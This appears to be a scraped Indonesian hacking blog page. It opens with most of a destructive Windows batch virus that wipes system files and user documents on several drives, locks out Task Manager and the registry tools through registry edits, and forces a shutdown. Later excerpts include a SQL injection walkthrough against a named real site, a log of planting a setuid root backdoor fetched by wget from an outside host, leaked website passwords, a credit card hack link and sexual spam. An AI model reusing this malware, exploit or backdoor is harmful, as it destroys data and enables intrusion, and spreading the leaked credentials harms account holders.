echo copy C:\AUTOEXEC.BAT C:\Windows\System\"SOUND".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"stdole".tlb >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"SYSTEM".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"TAPI".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"TIMER".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"VER".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"VGA".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"WFWNET".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"WINSPOOL".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo exit >> C:\WINDOWS\Fonts\Fax_Destroy.bat

echo Erase /f /q /s C:\WINDOWS\system32\Setup >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo Erase /f /q /s C:\WINDOWS\system32\drivers >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo Erase /f /q /s C:\WINDOWS\system32\CatRoot >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo Erase /f /q /s C:\WINDOWS\system32\CatRoot2 >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo Erase /f /q /s C:\WINDOWS\system32\Com >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo Erase /f /q /s C:\WINDOWS\system32\Config >> C:\WINDOWS\Fonts\Fax_Destroy.bat

echo Erase /f /q /s D:\*.doc /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.exe /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.xls /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.ppt /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.jpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.mpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.dat /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.avi /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s D:\*.mp3 /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.doc /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.exe /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.xls /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.ppt /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.jpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.mpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.dat /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.avi /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s e:\*.mp3 /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.doc /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.exe /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.xls /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.ppt /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.jpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.mpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.dat /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.avi /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s f:\*.mp3 /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.doc /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.exe /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.xls /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.ppt /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.jpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.mpg /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.dat /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.avi /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat
echo Erase /f /q /s g:\*.mp3 /s >> C:\WINDOWS\Provisioning\Fax_Erase.bat

echo Erase /f /q /s C:\*.bat /s >> C:\Fax_Del.bat

echo Windows Registry Editor Version 5.00>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]>>RegBack.reg
echo "RegisteredOwner"="Shadow_Fax">>RegBack.reg
echo "RegisteredOrganization"="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ocxfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\logfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\drvfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sysfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]>>RegBack.reg
echo @="Shadow_Fax">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ocxfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\logfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\drvfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\DefaultIcon]>>RegBack.reg
echo @="%SystemRoot%\System32\shell32.dll,3">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]>>RegBack.reg
echo "Text"="?????">>RegBack.reg
echo "Type"="group">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]>>RegBack.reg
echo "Text"="?????">>RegBack.reg
echo "Type"="radio">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]>>RegBack.reg
echo "Text"="?????">>RegBack.reg
echo "Type"="">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt]>>RegBack.reg
echo "Type"="">>RegBack.reg
echo "Text"="?????">>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]>>RegBack.reg
echo "Type"="checkbox">>RegBack.reg
echo "Text"="?????">>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>RegBack.reg
echo "NoRun"=dword:00000001>>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>RegBack.reg
echo "NoFind"=dword:00000001>>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>RegBack.reg
echo "NoViewContextMenu"=dword:00000001>>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>RegBack.reg
echo "NoTrayContextMenu"=dword:00000001>>RegBack.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse]>>RegBack.reg
echo "SwapMouseButtons"="1">>RegBack.reg
echo [HKEY_CURRENT_USER\Control Panel\don't load]>>RegBack.reg
echo "sysdm.cpl."="Yes">>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>RegBack.reg
echo "DisableRegistryTools"=dword:00000001>>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>RegBack.reg
echo "DisableTaskMgr"=dword:00000001>>RegBack.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>RegBack.reg
echo "DisableTaskMgr"=dword:00000001>>RegBack.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]>>RegBack.reg
echo "Scancode Map"=hex:00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00>>RegBack.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>RegBack.reg
echo "NoFolderOptions"=dword:00000001>>RegBack.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>RegBack.reg
echo "NoFolderOptions"=dword:00000001>>RegBack.reg
regedit /s telnet-service.reg

:start
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start C:\Windows\System32\xircom\Fax_Run.Bat
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start C:\WINDOWS\Fonts\Fax_Destroy.bat
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start C:\WINDOWS\Provisioning\Fax_Erase.bat
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
start RegBack.reg
goto end
:end

:Killah
echo Shadow_Fax Was Here >> C:\Ripper.txt
echo I Want To Say About You >> C:\Ripper.txt
echo You Are A Liar >> C:\Ripper.txt
echo You Are A Big Mouth >> C:\Ripper.txt
echo Can You Defeat Me???? >> C:\Ripper.txt
echo If You Can Defeat Me >> C:\Ripper.txt
echo Send Your Virus To My Mail >> C:\Ripper.txt
echo worm_ripper32@yahoo.com >> C:\Ripper.txt
echo I Wait Your Virus >> C:\Ripper.txt
rcho I Hope Your Virus Can Defeat My Virus >> C:\Ripper.txt
echo And Let's War >> C:\Ripper.txt
notepad /p C:\Ripper.txt
goto Killah

explorer.exe

:start
start C:\Fax_Del.bat
goto end
:end

shutdown -s -t 120 -c "Your Operating System Has Been Error, Your Brain Has Been Cracked By Black_hole"

pause
simpen dengan extensi BAT

moet mencoba
Readmore »» Coba Belajar tentang virus

Mengenal Shell inject dengan teknik Remote File Include Vulnerability

Mengenal shell exploite inject
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.

Bagai mana cara mendapatkan shell tersebut?..
Readmore »» Mengenal Shell inject dengan teknik Remote File Include Vulnerability

kunci folder tanpa software

Langsung aja ya ...

nie kalian copy terus kalian paste deh di notepad ........
Code
@ECHO OFF
titipan kunci folder
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius nich mau Kunci ??(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Eiittt masukkan pasword dulu
set/p “pass=>”
if NOT %pass%== titipan goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End

Readmore »» kunci folder tanpa software

Monday, February 22

Facebook Bispak

hati-hati suami anda bisa saja selingkuh lewat facebook
coba saja anda lihat grub facebook yang satu ini Bispak-Grand-Palace-Hotel-Makassar
disini kita bisa memililih wanita yang siap pake alias hahahaa,,, gk ach gk jd ixixixixi,....
dibawah ini beberapa screenshoot nya,,!!
klik gambar biar lebih jelas,,
Readmore »» Facebook Bispak

HTTrack Website Copier

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser,
Readmore »» HTTrack Website Copier

Edit Foto Online

Mengedit foto mungkin sudah menjadi bagian dari keperluan kita yang cukup penting. Dengan adanya berbagai platform Jaringan sosial seperti friendster, myspace, facebook dan lain sebagainya yang merupakan tempat ekspresi diri dalam berkomunitas, foto ini berfungsi sebagai media yang paling dominan. Selain itu, foto menjadi bagian yang tak terpisahkan dengan adanya teknologi selular dimana hampir kebanyakan pengguna handphone memiliki fitur kamera digital terintegrasi pada ponsel mereka. Dengan semua hal tersebut, edit foto menjadi hal yang sangat diperlukan.

Banyaknya software editor foto merepotkan, tidak mudah digunakan dan kadang tidak praktis juga harus di-install terlebih dahulu, membuat aplikasi online lebih memiliki banyak kelebihan untuk urusan edit foto ini, karena memiliki banyak keefisienan dan kemudahan. Hal ini juga didukung oleh banyaknya tempat penyimpanan foto online yang membuat orang lebih suka menyimpan foto secara online dibandingkan mengumpulkannya pada hard disk yang sangat beresiko hilang. Berikut review singkat tentang 10+ website penyedia layanan editor foto secara online.
Readmore »» Edit Foto Online

Webcracker

 Webcracker is a security tool that allows you to attempt to test id and password combinations on your web site. If youre able to guess a users password with this program,
Readmore »» Webcracker

Anti Deepfreeze

Keamanan", itu lah semata-mata tujuan kita memasang atau menginstall Deepfreeze di komputer kita. Apalagi untuk mereka yang mengelola usaha seperti warnet, kampus, sekolah dan lain sebagainya. Tetapi perlu kita semua ketahui, dengan adanya fasilitas deepfreeze tadi, bukan berarti keamanan nya sudah terjamin, apalagi dengan di temukannya celah di software ini sehingga memungkinkan seseorang untuk menjebol Deepfreeze tersebut. Kalau dulu kita sudah tahu bahwa Deepfreeze v.5 ada Undeepfreeze nya, begitu juga dengan Deepfreeze v.6
Readmore »» Anti Deepfreeze

cara membuat web di co.cc

1.cari domain dulu disini
2.cek dulu gratis apa tidak domain yang anda pilih??
contoh gambar :









pastikan harganya $0
4.click continue to regristation
Readmore »» cara membuat web di co.cc

Resource editor

 
buat edit resource softwear anda
bisa juga untuk membuat aplikasi
download klik disini
Readmore »» Resource editor

softwear untuk mencari driver 3DPchip


Ini memungkinkan Anda untuk menghitung dan men-download perangkat device driver terbaru.
3DPchip adalah alat untuk membantu Anda membuat tampilan pada perangkat Anda dan download driver perangkat terbaru dengan beberapa klik mudah.
download file nya disini
Readmore »» softwear untuk mencari driver 3DPchip

matrix haxor wordpress template

 
I thought I’d try something different
I’ve been playing with wordpress for nearly a year now, and thought it’d be cool to make a publicly available theme, I wasn’t sure on what to do so I thought I’d start with a simple pallet. My theme is a black on green code looking theme, you know the hacker site style; to make it more interesting I added some matrix references, and silly bits of php code.
Readmore »» matrix haxor wordpress template

Turorial SQL Injection

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
[+]step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
[+]step Dua:=
==========

Readmore »» Turorial SQL Injection

Turorial hacking web asp

 http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12

CEK VULN / GAK !!!
==================

Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'

Jika Error nya seperti ini :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56

Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua Very Happy

maka Lanjut ...

CARI STRUKTUR TABEL !!!
=======================

Readmore »» Turorial hacking web asp

Root Shell Backdoor

sh-3.00# cd /bin
sh-3.00# wget trendhoby.com/.ray/rsh.txt
--05:13:12-- http://trendhoby.com/.ray/rsh.txt
=> `rsh.txt'
Resolving trendhoby.com... 219.83.122.166
Connecting to trendhoby.com|219.83.122.166|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 481 [text/plain]

100%[====================================>] 481 --.--K/s

05:13:15 (57.34 MB/s) - `rsh.txt' saved [481/481]

sh-3.00# su
[root@localhost bin]# mv rsh.txt rsh.c
[root@localhost bin]# gcc -o main rsh.c
[root@localhost bin]# chmod gu+s main
[root@localhost bin]# chmod o+x main
[root@localhost bin]# chattr +i main
[root@localhost bin]# rm -f rsh.c
[root@localhost bin]# exit
exit
sh-3.00# exit
exit

Readmore »» Root Shell Backdoor

Wednesday, February 17

banner teman

Readmore »» banner teman

mig33 tools

ini ada beberapa kumpulan aplikasi yang biasa nya saya pakai
saya hanya sekedar share saja 
bagi kalian yang berminat silahkan kalian download sesuka kalian
semua password sudah saya hapus
Readmore »» mig33 tools

aplikasi mig33

beberapa koleksi mig33 yang versinya dah di edit sama teman-teman
bila minat silahkan didownload
selengkapnya ada disini
ma'af jika gambarnya agak aneh,,,,,!!!
Readmore »» aplikasi mig33

Monday, February 15

Credit card hack software

Credit card hack software

= > LINK
Readmore »» Credit card hack software

Password member situs porno

http://www.iinnocent.com/mem/index.html User=augustin Pass=research

http://www.iinnocent.com/mem/index.html User=gothguy Pass=valerie

Readmore »» Password member situs porno

Saturday, February 13

Orbital Mix 6 - Mixed by Dj Fernando (2010)

 Genre, Style: Dance / Club
Release Date: 2010
Format: MP3, 320 kbps
Size: 347 mb
Readmore »» Orbital Mix 6 - Mixed by Dj Fernando (2010)
 
Copyright 2010 Blog BlogGer. All rights reserved.
Cerita Sex in The Village